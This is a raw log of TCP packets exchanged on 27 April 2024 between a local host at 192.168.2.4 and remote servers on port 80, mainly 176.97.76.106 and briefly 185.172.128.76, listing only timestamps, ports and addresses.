Apr 27, 2024 00:46:06.193449974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193471909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193485022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193515062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193535089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193566084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193595886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193614960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193629026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193641901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193690062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193702936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193713903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193737030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193752050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193754911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193800926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193820000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193821907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193876982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193890095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193898916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193938971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193958998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193990946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194032907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194045067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194051981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194056988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194096088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194096088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194117069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194139004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194168091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194225073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194266081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194287062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194319010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194330931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194406033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194418907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194426060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194447994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194467068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194489956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.194508076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.194551945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196592093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.196616888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196640968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196676016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196696997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.196753025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196765900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196794987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196815014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.196835995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196897984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196918964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.196934938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196949005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.196985006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.196985006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197009087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197021008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197082996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197135925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197163105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197217941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197236061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197253942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197299957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197312117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197319984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197336912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197349072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197356939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197366953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197381973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197386980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197393894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197429895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197429895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197436094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197468042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197536945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197550058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197580099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197599888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197632074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197658062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197676897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197719097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197782040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197803020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197824001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197837114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197854042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197896957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197932959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197946072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.197988033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197988033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.197999954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198012114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198035002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198108912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198129892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198142052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198163033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198174953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198187113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198199034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198199987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198210955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198223114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198223114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198235035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198244095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198246956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198266029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198277950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198318958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198318958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198333025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198347092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198359013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198364019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198390961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198404074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198409081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198436022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198477030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198496103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.198512077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.198533058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226373911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226389885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226402044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226414919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226425886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226469040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226483107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226494074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226495981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226505995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226511002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226525068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226608038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226622105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226629019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226633072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226644993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226656914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226675987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226774931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226788044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226799011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226815939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226845980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226845980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.226871014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226885080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226907969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.226969004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227005005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227030039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227051020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227063894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227132082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227155924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227174044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227186918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227210045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227236032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227258921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227279902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227314949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227340937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227363110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227386951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227406979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227473974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227489948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227541924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227555037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227565050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227597952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227611065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227617979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227678061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227690935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227699995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227703094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227722883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227755070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227785110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227807045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227821112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227835894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227850914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227870941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227879047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227941990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227953911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227965117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.227966070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.227987051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228039026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228053093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228072882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228085041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228095055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228140116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228152037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228162050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228185892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228199959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228210926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228210926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228224993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228235006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228235960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228247881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228260994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228271008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228311062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228324890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228324890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228346109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228369951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228387117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228399038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228471041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228490114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228509903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228523016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228554010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228565931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228565931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.228590012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.228662968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.230161905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.230215073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.230222940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.230231047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:06.230249882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.230290890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:06.230303049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.230318069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.230379105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:06.230379105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:06.260334969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385108948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385164022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385200977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385209084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385236979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385261059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385272980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385277987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385284901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385296106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385307074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385312080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385333061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385346889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385349035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385359049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385364056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385382891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385392904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385396957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385409117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385442972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.385452032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.385488033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.386221886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.386234999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.386246920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.386260033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.386270046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.386305094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387178898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387192965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387203932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387223959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387245893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387259007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387274981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387305975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387320042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387336969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387351036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387382030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387603998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387686014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387701988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387715101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387738943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387757063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387761116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387787104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387821913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387891054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387902975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387913942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387926102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387931108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387953997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.387967110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.387984991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388008118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388017893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388041019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388070107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388076067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388147116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388170958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388183117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388185024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388206005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388216019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388222933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388253927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388273001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388298035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388329029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388385057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388397932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388408899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388421059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388431072 CEST	49734	80	192.168.2.4	176.97.76.106
